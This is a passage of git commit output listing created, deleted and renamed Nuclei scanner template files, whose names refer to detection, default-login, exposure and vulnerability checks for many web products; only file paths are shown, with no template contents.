nuclei-templates/Other/dir-850l-login-panel.yaml create mode 100644 nuclei-templates/Other/dir-listing-7006.yaml delete mode 100644 nuclei-templates/Other/dir-listing.yaml rename nuclei-templates/Other/{directadmin-login-panel.yaml => directadmin-login-panel-7000.yaml} (100%) rename nuclei-templates/Other/{ZhongkeWangwei-fileRead.yaml => discuz-config-global.yaml} (100%) rename nuclei-templates/Other/{dixell-xweb500-filewrite.yaml => dixell-xweb500-filewrite-7019.yaml} (100%) delete mode 100644 nuclei-templates/Other/django-admin-panel-7021.yaml create mode 100644 nuclei-templates/Other/django-admin-panel-7023.yaml rename nuclei-templates/Other/{django-debug-detect.yaml => django-debug-detect-7024.yaml} (100%) rename nuclei-templates/Other/{django-debug-exposure.yaml => django-debug-exposure-7029.yaml} (100%) rename nuclei-templates/Other/{django-framework-exceptions-7033.yaml => django-framework-exceptions-7034.yaml} (100%) delete mode 100644 nuclei-templates/Other/django-secret-key.yaml create mode 100644 nuclei-templates/Other/django-secret.key.yaml rename nuclei-templates/Other/{dlink-850l-info-leak-7035.yaml => dlink-850l-info-leak-7038.yaml} (100%) create mode 100644 nuclei-templates/Other/dns-320l.yaml create mode 100644 nuclei-templates/Other/docker-compose-config-7057.yaml delete mode 100644 nuclei-templates/Other/docker-compose-config.yaml create mode 100644 nuclei-templates/Other/docker-registry-7064.yaml delete mode 100644 nuclei-templates/Other/docker-registry-7067.yaml rename nuclei-templates/Other/{dolibarr-detect-7069.yaml => dolibarr-detect-7071.yaml} (100%) create mode 100644 nuclei-templates/Other/dolphinscheduler-default-login-7072.yaml delete mode 100644 nuclei-templates/Other/dolphinscheduler-default-login.yaml delete mode 100644 nuclei-templates/Other/dom-invaider.yaml create mode 100644 nuclei-templates/Other/dom-xss-7080.yaml create mode 100644 nuclei-templates/Other/dos.yaml create mode 100644 nuclei-templates/Other/dotclear-detect.yaml rename nuclei-templates/Other/{dotcms-admin-panel-7085.yaml => dotcms-admin-panel-7087.yaml} (100%) delete mode 100644 nuclei-templates/Other/dotnetcms-sqli-7089.yaml create mode 100644 nuclei-templates/Other/dotnetcms-sqli.yaml create mode 100644 nuclei-templates/Other/druid-detect.yaml rename nuclei-templates/Other/{druid-monitor-7103.yaml => druid-monitor-7100.yaml} (100%) rename nuclei-templates/Other/{drupal-install.yaml => drupal-install-7106.yaml} (100%) rename nuclei-templates/Other/{drupal-user-enum-redirect-7114.yaml => drupal-user-enum-redirect-7115.yaml} (100%) rename nuclei-templates/Other/{signatures-10262.yaml => drupal.yaml} (100%) delete mode 100644 nuclei-templates/Other/dubbo-admin-default-login-7120.yaml create mode 100644 nuclei-templates/Other/dubbo-admin-default-login.yaml rename nuclei-templates/Other/{dvwa-default-login.yaml => dvwa-default-login-7128.yaml} (100%) create mode 100644 nuclei-templates/Other/dvwa-headless-automatic-login-7131.yaml delete mode 100644 nuclei-templates/Other/dvwa-headless-automatic-login.yaml create mode 100644 nuclei-templates/Other/dwr-921-login-panel.yaml create mode 100644 nuclei-templates/Other/dwr-index-detect-7135.yaml delete mode 100644 nuclei-templates/Other/dwr-index-detect.yaml rename nuclei-templates/Other/{dwsync-exposure.yaml => dwsync-exposure-7138.yaml} (100%) rename nuclei-templates/Other/{dynamic-broadcast-receiver.yaml => dynamic-broadcast-receiver-7142.yaml} (100%) rename nuclei-templates/Other/{dynamicweb-panel.yaml => dynamicweb-panel-7144.yaml} (100%) delete mode 100644 nuclei-templates/Other/dynatrace-token.yaml create mode 100644 nuclei-templates/Other/dzs-zoomsounds-listing-7148.yaml delete mode 100644 nuclei-templates/Other/dzs-zoomsounds-listing.yaml create mode 100644 nuclei-templates/Other/dzzoffice.yaml create mode 100644 nuclei-templates/Other/e-cology.yaml rename nuclei-templates/Other/{E-message-database.yaml => e-message-database.yaml} (100%) create mode 100644 nuclei-templates/Other/easy-media-gallery-pro-listing-7150.yaml delete mode 100644 nuclei-templates/Other/easy-media-gallery-pro-listing.yaml create mode 100644 nuclei-templates/Other/easy-wp-smtp-listing-7156.yaml delete mode 100644 nuclei-templates/Other/easy-wp-smtp-listing.yaml create mode 100644 nuclei-templates/Other/ec2-detection-7162.yaml delete mode 100644 nuclei-templates/Other/ec2-detection.yaml delete mode 100644 nuclei-templates/Other/ecoa-building-automation-lfd-7165.yaml create mode 100644 nuclei-templates/Other/ecoa-building-automation-lfd.yaml delete mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload-7169.yaml create mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload.yaml create mode 100644 nuclei-templates/Other/ecology-filedownload-directory-traversal-7172.yaml delete mode 100644 nuclei-templates/Other/ecology-filedownload-directory-traversal.yaml rename nuclei-templates/Other/{ecology-oa-filedownloadforoutdoc-sqli.yaml => ecology-oa-FileDownloadForOutDoc-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/ecology-springframework-directory-traversal-7175.yaml delete mode 100644 nuclei-templates/Other/ecology-springframework-directory-traversal.yaml delete mode 100644 nuclei-templates/Other/ecology-v8-sqli-7179.yaml create mode 100644 nuclei-templates/Other/ecology-v8-sqli.yaml rename nuclei-templates/Other/{eg-manager-detect-7183.yaml => eg-manager-detect-7184.yaml} (100%) create mode 100644 nuclei-templates/Other/eibiz-lfi-7186.yaml delete mode 100644 nuclei-templates/Other/eibiz-lfi.yaml delete mode 100644 nuclei-templates/Other/elasticsearch-sql-client-detect-7190.yaml create mode 100644 nuclei-templates/Other/elasticsearch-sql-client-detect.yaml create mode 100644 nuclei-templates/Other/elasticsearch.yaml rename nuclei-templates/Other/{electron-version-detect.yaml => electron-version-detect-7198.yaml} (100%) rename nuclei-templates/Other/{elfinder-detect.yaml => elfinder-detect-7202.yaml} (100%) rename nuclei-templates/Other/{elfinder-path-traversal.yaml => elfinder-path-traversal(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/elfinder-version-7205.yaml create mode 100644 nuclei-templates/Other/elfinder-version.yaml create mode 100644 nuclei-templates/Other/elfinder.yaml delete mode 100644 nuclei-templates/Other/elmah-log-file-7207.yaml create mode 100644 nuclei-templates/Other/elmah-log-file.yaml create mode 100644 nuclei-templates/Other/email-extraction-7210.yaml delete mode 100644 nuclei-templates/Other/email-extraction.yaml create mode 100644 nuclei-templates/Other/email-obfuscate-shortcode.yaml delete mode 100644 nuclei-templates/Other/emerson-power-panel-7215.yaml create mode 100644 nuclei-templates/Other/emerson-power-panel.yaml create mode 100644 nuclei-templates/Other/empirecms-xss-7220.yaml delete mode 100644 nuclei-templates/Other/empirecms-xss.yaml create mode 100644 nuclei-templates/Other/emqx-default-login-7222.yaml delete mode 100644 nuclei-templates/Other/emqx-default-login.yaml rename nuclei-templates/Other/{enable-secret-for-password-user-and-.yaml => enable-secret-for-user-and-password.yaml} (100%) create mode 100644 nuclei-templates/Other/endpoint_protection_manager.yaml create mode 100644 nuclei-templates/Other/epmp-login-7231.yaml delete mode 100644 nuclei-templates/Other/epmp-login.yaml create mode 100644 nuclei-templates/Other/epson-web-control-detect-7239.yaml delete mode 100644 nuclei-templates/Other/epson-web-control-detect.yaml create mode 100644 nuclei-templates/Other/error-based.yaml create mode 100644 nuclei-templates/Other/esmtprc-config-7260.yaml delete mode 100644 nuclei-templates/Other/esmtprc-config.yaml create mode 100644 nuclei-templates/Other/etcd-keys-7261.yaml delete mode 100644 nuclei-templates/Other/etcd-keys-7262.yaml create mode 100644 nuclei-templates/Other/etl3100.yaml create mode 100644 nuclei-templates/Other/etouch-v2-sqli-7268.yaml delete mode 100644 nuclei-templates/Other/etouch-v2-sqli.yaml create mode 100644 nuclei-templates/Other/ewebs-arbitrary-file-reading-7270.yaml delete mode 100644 nuclei-templates/Other/ewebs-arbitrary-file-reading.yaml create mode 100644 nuclei-templates/Other/exacqvision-default-login-7277.yaml delete mode 100644 nuclei-templates/Other/exacqvision-default-login.yaml create mode 100644 nuclei-templates/Other/exit-notifier.yaml create mode 100644 nuclei-templates/Other/experience_manager_cloud_service.yaml create mode 100644 nuclei-templates/Other/exploit-CVE-2022-1388.yaml create mode 100644 nuclei-templates/Other/exposed-alps-spring-7283.yaml delete mode 100644 nuclei-templates/Other/exposed-alps-spring.yaml create mode 100644 nuclei-templates/Other/exposed-bitkeeper-7291.yaml delete mode 100644 nuclei-templates/Other/exposed-bitkeeper.yaml rename nuclei-templates/Other/{exposed-bzr.yaml => exposed-bzr-7295.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-darcs-7297.yaml delete mode 100644 nuclei-templates/Other/exposed-darcs-7298.yaml delete mode 100644 nuclei-templates/Other/exposed-docker-api-7299.yaml create mode 100644 nuclei-templates/Other/exposed-docker-api.yaml create mode 100644 nuclei-templates/Other/exposed-gitignore-7303.yaml delete mode 100644 nuclei-templates/Other/exposed-gitignore-7304.yaml rename nuclei-templates/Other/{exposed-glances-api-7309.yaml => exposed-glances-api-7308.yaml} (100%) delete mode 100644 nuclei-templates/Other/exposed-jquery-file-upload-7315.yaml create mode 100644 nuclei-templates/Other/exposed-jquery-file-upload.yaml create mode 100644 nuclei-templates/Other/exposed-kafdrop-7316.yaml delete mode 100644 nuclei-templates/Other/exposed-kafdrop.yaml rename nuclei-templates/Other/{exposed-kibana.yaml => exposed-kibana-7320.yaml} (100%) rename nuclei-templates/Other/{exposed-mysql-initial.yaml => exposed-mysql-initial-7322.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-nomad-7329.yaml delete mode 100644 nuclei-templates/Other/exposed-nomad.yaml delete mode 100644 nuclei-templates/Other/exposed-pii.yaml delete mode 100644 nuclei-templates/Other/exposed-prometheus-log-7333.yaml create mode 100644 nuclei-templates/Other/exposed-prometheus-log-7334.yaml create mode 100644 nuclei-templates/Other/exposed-redis-7338.yaml delete mode 100644 nuclei-templates/Other/exposed-redis.yaml rename nuclei-templates/Other/{exposed-service-now.yaml => exposed-service-now-7342.yaml} (100%) rename nuclei-templates/Other/{exposed-svn.yaml => exposed-svn-7351.yaml} (100%) rename nuclei-templates/Other/{exposed-vscode.yaml => exposed-vscode-7357.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-zookeeper-7362.yaml rename nuclei-templates/Other/{extract-urls.yaml => extract-urls-7368.yaml} (100%) rename nuclei-templates/Other/{eyelock-nano-lfd.yaml => eyelock-nano-lfd-7373.yaml} (100%) create mode 100644 nuclei-templates/Other/eyou-email-rce-7382.yaml delete mode 100644 nuclei-templates/Other/eyou-email-rce.yaml delete mode 100644 nuclei-templates/Other/f-secure-policy-manager-7560.yaml create mode 100644 nuclei-templates/Other/f-secure-policy-manager-7564.yaml rename nuclei-templates/Other/{Facebook-client-id.yaml => facebook-client-id-7384.yaml} (100%) rename nuclei-templates/Other/{fanruan-deserialization.yaml => fanruan-channel-deserialization.yaml} (100%) rename nuclei-templates/Other/{fanruanoa-detect.yaml => fanruanoa-detect-7391.yaml} (100%) rename nuclei-templates/Other/{fanruanoa2012-detect.yaml => fanruanoa2012-detect-7388.yaml} (100%) rename nuclei-templates/Other/{fanruanoa2012-disclosure.yaml => fanruanoa2012-disclosure-7389.yaml} (100%) create mode 100644 nuclei-templates/Other/fastAPI-1.yaml create mode 100644 nuclei-templates/Other/fastAPI-2.yaml create mode 100644 nuclei-templates/Other/fastAPI-3.yaml create mode 100644 nuclei-templates/Other/fastAPI-4.yaml create mode 100644 nuclei-templates/Other/fastAPI-5.yaml rename nuclei-templates/Other/{fastjson-1-2-24-rce.yaml => fastjson-1-2-24-rce-7400.yaml} (100%) rename nuclei-templates/Other/{fastjson-1-2-41-rce.yaml => fastjson-1-2-41-rce-7404.yaml} (100%) rename nuclei-templates/Other/{fastjson-1-2-42-rce.yaml => fastjson-1-2-42-rce-7408.yaml} (100%) rename nuclei-templates/Other/{fastjson-1-2-43-rce.yaml => fastjson-1-2-43-rce-7411.yaml} (100%) rename nuclei-templates/Other/{fastjson-1-2-47-rce.yaml => fastjson-1-2-47-rce-7415.yaml} (100%) create mode 100644 nuclei-templates/Other/fastjson-1-2-67-rce-7423.yaml delete mode 100644 nuclei-templates/Other/fastjson-1-2-67-rce.yaml rename nuclei-templates/Other/{fastjson-1-2-68-rce.yaml => fastjson-1-2-68-rce-7425.yaml} (100%) create mode 100644 nuclei-templates/Other/fastly-takeover-7429.yaml delete mode 100644 nuclei-templates/Other/fastly-takeover.yaml rename nuclei-templates/Other/{fatpipe-ipvpn-panel-7436.yaml => fatpipe-ipvpn-panel-7435.yaml} (100%) rename nuclei-templates/Other/{feedwordpress-xss.yaml => feedwordpress-xss-7459.yaml} (100%) create mode 100644 nuclei-templates/Other/feifeicms-lfr-7462.yaml delete mode 100644 nuclei-templates/Other/feifeicms-lfr-7465.yaml create mode 100644 nuclei-templates/Other/file-scheme-7467.yaml delete mode 100644 nuclei-templates/Other/file-scheme.yaml create mode 100644 nuclei-templates/Other/filezilla-7471.yaml delete mode 100644 nuclei-templates/Other/filezilla.yaml create mode 100644 nuclei-templates/Other/finereport-path-traversal-7478.yaml delete mode 100644 nuclei-templates/Other/finereport-path-traversal.yaml rename nuclei-templates/Other/{fingerprinthub-web-fingerprints.yaml => fingerprinthub-web-fingerprints-7480.yaml} (100%) rename nuclei-templates/Other/{fiorilaunchpad-logon.yaml => fiorilaunchpad-logon-7484.yaml} (100%) rename nuclei-templates/Other/{firebase-config-exposure-7485.yaml => firebase-config-exposure-7486.yaml} (100%) delete mode 100644 nuclei-templates/Other/firebase-database-7489.yaml create mode 100644 nuclei-templates/Other/firebase-database.yaml rename nuclei-templates/Other/{firebase-detect-7493.yaml => firebase-detect-7496.yaml} (100%) create mode 100644 nuclei-templates/Other/firebase-urls-7498.yaml delete mode 100644 nuclei-templates/Other/firebase-urls.yaml delete mode 100644 nuclei-templates/Other/fireware-xtm-user-authentication-7501.yaml create mode 100644 nuclei-templates/Other/fireware-xtm-user-authentication.yaml create mode 100644 nuclei-templates/Other/flexbe-takeover-7506.yaml delete mode 100644 nuclei-templates/Other/flexbe-takeover.yaml create mode 100644 nuclei-templates/Other/flexnet_publisher.yaml create mode 100644 nuclei-templates/Other/flightpath-panel-7507.yaml delete mode 100644 nuclei-templates/Other/flightpath-panel.yaml rename nuclei-templates/Other/{flink-exposure.yaml => flink-exposure-7511.yaml} (100%) create mode 100644 nuclei-templates/Other/flir-default-login-7513.yaml delete mode 100644 nuclei-templates/Other/flir-default-login.yaml delete mode 100644 nuclei-templates/Other/flir-path-traversal-7521.yaml create mode 100644 nuclei-templates/Other/flir-path-traversal-7522.yaml create mode 100644 nuclei-templates/Other/floating-contact.yaml create mode 100644 nuclei-templates/Other/flywheel-takeover.yaml delete mode 100644 nuclei-templates/Other/flywheel_takeover.yaml rename nuclei-templates/Other/{fortimail-panel.yaml => fortimail-panel-7531.yaml} (100%) create mode 100644 nuclei-templates/Other/fortinet-fortigate-panel-7535.yaml delete mode 100644 nuclei-templates/Other/fortinet-fortigate-panel.yaml create mode 100644 nuclei-templates/Other/fortiportal.yaml create mode 100644 nuclei-templates/Other/fortiweb-panel-7537.yaml delete mode 100644 nuclei-templates/Other/fortiweb-panel.yaml create mode 100644 nuclei-templates/Other/framework.yaml rename nuclei-templates/Other/{2755030215.yaml => freelancer.yaml} (100%) create mode 100644 nuclei-templates/Other/freshdesk-takeover-7540.yaml delete mode 100644 nuclei-templates/Other/freshdesk-takeover.yaml create mode 100644 nuclei-templates/Other/front-page-misconfig-7546.yaml delete mode 100644 nuclei-templates/Other/front-page-misconfig.yaml create mode 100644 nuclei-templates/Other/frontify-takeover-7544.yaml delete mode 100644 nuclei-templates/Other/frontify-takeover.yaml create mode 100644 nuclei-templates/Other/froxlor-detect-7551.yaml delete mode 100644 nuclei-templates/Other/froxlor-detect.yaml create mode 100644 nuclei-templates/Other/froxlor.yaml create mode 100644 nuclei-templates/Other/frp-default-login-7559.yaml delete mode 100644 nuclei-templates/Other/frp-default-login.yaml rename nuclei-templates/Other/{frServer-listDir.yaml => frserver-listdir.yaml} (100%) create mode 100644 nuclei-templates/Other/ftp-default-credentials.yaml delete mode 100644 nuclei-templates/Other/ftp-default-creds.yaml create mode 100644 nuclei-templates/Other/ftp-weak-credentials-7569.yaml delete mode 100644 nuclei-templates/Other/ftp-weak-credentials.yaml create mode 100644 nuclei-templates/Other/ftpconfig-7565.yaml delete mode 100644 nuclei-templates/Other/ftpconfig.yaml create mode 100644 nuclei-templates/Other/fuelcms-default-login-7572.yaml delete mode 100644 nuclei-templates/Other/fuelcms-default-login.yaml create mode 100644 nuclei-templates/Other/fumengyun-sqli.yaml rename nuclei-templates/Other/{xss-fuzz-html-tag-injection.yaml => fuzzing-xss-get-params-html-injection.yaml} (100%) create mode 100644 nuclei-templates/Other/g0.yaml rename nuclei-templates/Other/{ganglia-xml-grid-monitor.yaml => ganglia-xml-grid-monitor-7574.yaml} (100%) rename nuclei-templates/Other/{2848712183.yaml => ganglia.yaml} (100%) create mode 100644 nuclei-templates/Other/gemfury-takeover-7578.yaml delete mode 100644 nuclei-templates/Other/gemfury-takeover.yaml delete mode 100644 nuclei-templates/Other/general-tokens-7583.yaml create mode 100644 nuclei-templates/Other/general-tokens.yaml create mode 100644 nuclei-templates/Other/generic-linux-lfi-7589.yaml delete mode 100644 nuclei-templates/Other/generic-rfi.yaml rename nuclei-templates/Other/{generic-windows-lfi.yaml => generic-windows-lfi-7591.yaml} (100%) create mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi-7596.yaml delete mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi.yaml rename nuclei-templates/Other/{gespage-detect-7604.yaml => gespage-detect.yaml} (100%) rename nuclei-templates/Other/{gespage-panel.yaml => gespage-panel-7606.yaml} (100%) create mode 100644 nuclei-templates/Other/getresponse-takeover-7610.yaml delete mode 100644 nuclei-templates/Other/getresponse-takeover.yaml rename nuclei-templates/Other/{getsimple-cms-detect.yaml => getsimple-cms-detect-7614.yaml} (100%) create mode 100644 nuclei-templates/Other/getsimple-cms-detector-7612.yaml rename nuclei-templates/Other/{GetSimple-leakage.yaml => getsimple-leakage.yaml} (100%) create mode 100644 nuclei-templates/Other/ghost-takeover-7620.yaml delete mode 100644 nuclei-templates/Other/ghost-takeover-7622.yaml create mode 100644 nuclei-templates/Other/git-config-7633.yaml create mode 100644 nuclei-templates/Other/git-config-nginxoffbyslash-7632.yaml delete mode 100644 nuclei-templates/Other/git-config-nginxoffbyslash.yaml delete mode 100644 nuclei-templates/Other/git-config.yaml rename nuclei-templates/Other/{git-credentials.yaml => git-credentials-7643.yaml} (100%) delete mode 100644 nuclei-templates/Other/git-credentials-disclosure-7640.yaml create mode 100644 nuclei-templates/Other/git-credentials-disclosure-7641.yaml delete mode 100644 nuclei-templates/Other/git-mailmap-7710.yaml create mode 100644 nuclei-templates/Other/git-mailmap.yaml create mode 100644 nuclei-templates/Other/gitbook-takeover-7626.yaml delete mode 100644 nuclei-templates/Other/gitbook-takeover.yaml rename nuclei-templates/Other/{github-personal-token.yaml => github-personal-token-7657.yaml} (100%) delete mode 100644 nuclei-templates/Other/github-takeover-7661.yaml create mode 100644 nuclei-templates/Other/github-takeover-7662.yaml delete mode 100644 nuclei-templates/Other/github-workflows-disclosure-7665.yaml create mode 100644 nuclei-templates/Other/github-workflows-disclosure.yaml create mode 100644 nuclei-templates/Other/gitlab-api-user-enum-7668.yaml delete mode 100644 nuclei-templates/Other/gitlab-api-user-enum.yaml delete mode 100644 nuclei-templates/Other/gitlab-detect-7670.yaml create mode 100644 nuclei-templates/Other/gitlab-detect-7672.yaml rename nuclei-templates/Other/{gitlab-public-repos.yaml => gitlab-public-repos-7680.yaml} (100%) delete mode 100644 nuclei-templates/Other/gitlab-public-snippets-7686.yaml create mode 100644 nuclei-templates/Other/gitlab-public-snippets-7688.yaml create mode 100644 nuclei-templates/Other/gitlab-rce-7693.yaml delete mode 100644 nuclei-templates/Other/gitlab-rce.yaml create mode 100644 nuclei-templates/Other/gitlab-uninitialized-password-7695.yaml delete mode 100644 nuclei-templates/Other/gitlab-uninitialized-password.yaml create mode 100644 nuclei-templates/Other/gitlab-user-enum-7700.yaml delete mode 100644 nuclei-templates/Other/gitlab-user-enum.yaml create mode 100644 nuclei-templates/Other/gitlab-user-open-api-7702.yaml delete mode 100644 nuclei-templates/Other/gitlab-weak-login-7705.yaml create mode 100644 nuclei-templates/Other/gitlab-weak-login-7706.yaml rename nuclei-templates/Other/{gitlist-disclosure.yaml => gitlist-disclosure-7709.yaml} (100%) create mode 100644 nuclei-templates/Other/globalprotect-panel-7721.yaml delete mode 100644 nuclei-templates/Other/globalprotect-panel.yaml create mode 100644 nuclei-templates/Other/glpi-9.3.3-sql-injection.yaml create mode 100644 nuclei-templates/Other/glpi-authentication-7727.yaml delete mode 100644 nuclei-templates/Other/glpi-authentication.yaml rename nuclei-templates/Other/{glpi-directory-listing.yaml => glpi-directory-listing-7734.yaml} (100%) create mode 100644 nuclei-templates/Other/glpi-login-1.yaml create mode 100644 nuclei-templates/Other/glpi-login-2.yaml rename nuclei-templates/Other/{glpi-login.yaml => glpi-login-7736.yaml} (100%) rename nuclei-templates/Other/{glpi-telemetry-disclosure.yaml => glpi-telemetry-disclosure-7738.yaml} (100%) rename nuclei-templates/Other/{GLPIDirectoryListing.yaml => glpidirectorylisting(1).yaml} (100%) create mode 100644 nuclei-templates/Other/gnuboard5.yaml delete mode 100644 nuclei-templates/Other/go-anywhere-client-7743.yaml create mode 100644 nuclei-templates/Other/go-anywhere-client.yaml create mode 100644 nuclei-templates/Other/gocd-cruise-configuration-7748.yaml delete mode 100644 nuclei-templates/Other/gocd-cruise-configuration.yaml create mode 100644 nuclei-templates/Other/gocd-login-7751.yaml delete mode 100644 nuclei-templates/Other/gocd-login-7753.yaml delete mode 100644 nuclei-templates/Other/gogs-install-exposure-7755.yaml create mode 100644 nuclei-templates/Other/gogs-install-exposure.yaml create mode 100644 nuclei-templates/Other/goip-1-lfi-7764.yaml delete mode 100644 nuclei-templates/Other/goip-1-lfi.yaml rename nuclei-templates/Other/{golang-metrics.yaml => golang-metrics-7765.yaml} (100%) rename nuclei-templates/Other/{google-api-key.yaml => google-api-key-7770.yaml} (100%) create mode 100644 nuclei-templates/Other/google-floc-disabled-7784.yaml delete mode 100644 nuclei-templates/Other/google-floc-disabled.yaml create mode 100644 nuclei-templates/Other/google-storage-7788.yaml delete mode 100644 nuclei-templates/Other/google-storage.yaml rename nuclei-templates/Other/{googlet-extsearchplaces.yaml => google-textsearchplaces.yaml} (100%) rename nuclei-templates/Other/{gophish-default-login-7793.yaml => gophish-default-login-7792.yaml} (100%) create mode 100644 nuclei-templates/Other/gophish-login-7796.yaml delete mode 100644 nuclei-templates/Other/gophish-login.yaml delete mode 100644 nuclei-templates/Other/gradio-CVE-2024-1183.yaml rename nuclei-templates/Other/{gradle-enterprise-panel.yaml => gradle-enterprise-panel-7799.yaml} (100%) create mode 100644 nuclei-templates/Other/grafana-default-login-7804.yaml delete mode 100644 nuclei-templates/Other/grafana-default-login.yaml delete mode 100644 nuclei-templates/Other/grafana-detect-7807.yaml create mode 100644 nuclei-templates/Other/grafana-detect-7808.yaml create mode 100644 nuclei-templates/Other/grafana-file-read.yaml rename nuclei-templates/Other/{grafana-public-signup-7816.yaml => grafana-public-signup-7814.yaml} (100%) rename nuclei-templates/Other/{grails-database-admin-console-7820.yaml => grails-database-admin-console-7819.yaml} (100%) rename nuclei-templates/Other/{grandstream-device-configuration.yaml => grandstream-device-configuration-7823.yaml} (100%) create mode 100644 nuclei-templates/Other/graphql-alias-batching-7826.yaml delete mode 100644 nuclei-templates/Other/graphql-alias-batching.yaml delete mode 100644 nuclei-templates/Other/graphql-detect-7830.yaml create mode 100644 nuclei-templates/Other/graphql-detect-7831.yaml create mode 100644 nuclei-templates/Other/graphql-get-method-7836.yaml delete mode 100644 nuclei-templates/Other/graphql-get-method.yaml rename nuclei-templates/Other/{grav-cms-detect.yaml => grav-cms-detect-7842.yaml} (100%) create mode 100644 nuclei-templates/Other/graylog-api-browser-7846.yaml delete mode 100644 nuclei-templates/Other/graylog-api-browser.yaml create mode 100644 nuclei-templates/Other/groupoffice-lfi-7851.yaml delete mode 100644 nuclei-templates/Other/groupoffice-lfi.yaml rename nuclei-templates/Other/{gruntfile-exposure.yaml => gruntfile-exposure-7852.yaml} (100%) create mode 100644 nuclei-templates/Other/gt-ac2900-login(1).yaml create mode 100644 nuclei-templates/Other/guacamole-default-login-7858.yaml delete mode 100644 nuclei-templates/Other/guacamole-default-login-7861.yaml rename nuclei-templates/Other/{gunicorn-detect.yaml => gunicorn-detect-7863.yaml} (100%) delete mode 100644 nuclei-templates/Other/h2console-panel-7866.yaml create mode 100644 nuclei-templates/Other/h2console-panel.yaml rename nuclei-templates/Other/{h2csmuggle-upgrade-only-nuclei.yaml => h2csmuggle-nuclei.yaml} (100%) rename nuclei-templates/Other/{h3c-imc-rce.yaml => h3c-imc-rce-7870.yaml} (100%) rename nuclei-templates/Other/{H3C-SECPATH-loginBypass.yaml => h3c-secpath-loginbypass.yaml} (100%) rename nuclei-templates/Other/{hadoop-exposure.yaml => hadoop-exposure-7872.yaml} (100%) rename nuclei-templates/Other/{hadoop-unauth.yaml => hadoop-unauth-7875.yaml} (100%) create mode 100644 nuclei-templates/Other/haproxy-status-7883.yaml delete mode 100644 nuclei-templates/Other/haproxy-status.yaml create mode 100644 nuclei-templates/Other/hashicorp-consul-rce-7891.yaml delete mode 100644 nuclei-templates/Other/hashicorp-consul-rce-7894.yaml delete mode 100644 nuclei-templates/Other/hashicorp-consul-webgui-7898.yaml create mode 100644 nuclei-templates/Other/hashicorp-consul-webgui.yaml delete mode 100644 nuclei-templates/Other/hasura-graphql-ssrf-7903.yaml create mode 100644 nuclei-templates/Other/hasura-graphql-ssrf-7905.yaml create mode 100644 nuclei-templates/Other/hb-audio-lfi-7911.yaml delete mode 100644 nuclei-templates/Other/hb-audio-lfi.yaml create mode 100644 nuclei-templates/Other/header-blind-time-sql-injection.yaml rename nuclei-templates/Other/{helpjuice-takeover-7925.yaml => helpjuice-takeover-7927.yaml} (100%) create mode 100644 nuclei-templates/Other/helprace-takeover-7931.yaml delete mode 100644 nuclei-templates/Other/helprace-takeover.yaml create mode 100644 nuclei-templates/Other/hg255s.yaml create mode 100644 nuclei-templates/Other/hg532e.yaml create mode 100644 nuclei-templates/Other/hiboss-rce-7948.yaml delete mode 100644 nuclei-templates/Other/hiboss-rce-7949.yaml create mode 100644 nuclei-templates/Other/hide-security-enhancer-lfi-7952.yaml delete mode 100644 nuclei-templates/Other/hide-security-enhancer-lfi.yaml create mode 100644 nuclei-templates/Other/hikvision-detection-1.yaml create mode 100644 nuclei-templates/Other/hikvision-detection-7955.yaml delete mode 100644 nuclei-templates/Other/hikvision-detection.yaml rename nuclei-templates/Other/{hikvision-info-leak.yaml => hikvision-info-leak-7958.yaml} (100%) delete mode 100644 nuclei-templates/Other/hivemanager-login-panel-7966.yaml create mode 100644 nuclei-templates/Other/hivemanager-login-panel.yaml rename nuclei-templates/Other/{hjtcloud-arbitrary-file-read-7970.yaml => hjtcloud-arbitrary-file-read.yaml} (100%) create mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read-7976.yaml delete mode 100644 nuclei-templates/Other/hjtcloud-rest-arbitrary-file-read.yaml rename nuclei-templates/Other/{hmc-hybris-panel-7978.yaml => hmc-hybris-panel-7977.yaml} (100%) delete mode 100644 nuclei-templates/Other/homeautomation-v3-openredirect-7982.yaml create mode 100644 nuclei-templates/Other/homeautomation-v3-openredirect.yaml rename nuclei-templates/Other/{3867691789.yaml => honeypot.yaml} (100%) create mode 100644 nuclei-templates/Other/honeywell-building-control-7987.yaml delete mode 100644 nuclei-templates/Other/honeywell-building-control.yaml create mode 100644 nuclei-templates/Other/honeywell-web-controller-7995.yaml delete mode 100644 nuclei-templates/Other/honeywell-web-controller.yaml delete mode 100644 nuclei-templates/Other/hongdian-default-login-7998.yaml create mode 100644 nuclei-templates/Other/hongdian-default-login.yaml rename nuclei-templates/Other/{hostheaderpoisoning.yaml => host-header-poisoning.yaml} (100%) create mode 100644 nuclei-templates/Other/hp-blade-admin-detect-8005.yaml delete mode 100644 nuclei-templates/Other/hp-blade-admin-detect.yaml delete mode 100644 nuclei-templates/Other/hp-color-laserjet-detect-8006.yaml create mode 100644 nuclei-templates/Other/hp-color-laserjet-detect.yaml rename nuclei-templates/Other/{hp-device-info-detect-8009.yaml => hp-device-info-detect-8008.yaml} (100%) rename nuclei-templates/Other/{hp-ilo-5-8021.yaml => hp-ilo-5.yaml} (100%) rename nuclei-templates/Other/{hp-ilo-serial-key-disclosure-8025.yaml => hp-ilo-serial-key-disclosure-8023.yaml} (100%) delete mode 100644 nuclei-templates/Other/hp-laserjet-detect-8028.yaml create mode 100644 nuclei-templates/Other/hp-laserjet-detect.yaml create mode 100644 nuclei-templates/Other/hp-switch-default-login-8036.yaml delete mode 100644 nuclei-templates/Other/hp-switch-default-login.yaml create mode 100644 nuclei-templates/Other/hpe-system-management-anonymous-8013.yaml delete mode 100644 nuclei-templates/Other/hpe-system-management-anonymous.yaml rename nuclei-templates/Other/{hrsale-unauthenticated-lfi.yaml => hrsale-unauthenticated-lfi-8039.yaml} (100%) rename nuclei-templates/Other/{hst-fileread.yaml => hst-fileRead.yaml} (100%) create mode 100644 nuclei-templates/Other/htaccess-config-8044.yaml delete mode 100644 nuclei-templates/Other/htaccess-config.yaml rename nuclei-templates/Other/{htpasswd-detection.yaml => htpasswd-detection-8046.yaml} (100%) rename nuclei-templates/Other/{http-missing-security-headers.yaml => http-missing-security-headers-8058.yaml} (100%) rename nuclei-templates/Other/{http-raw-multiple.yaml => http-raw.yaml} (100%) rename nuclei-templates/Other/{http-hsts-header.yaml => http-xframe-header.yaml} 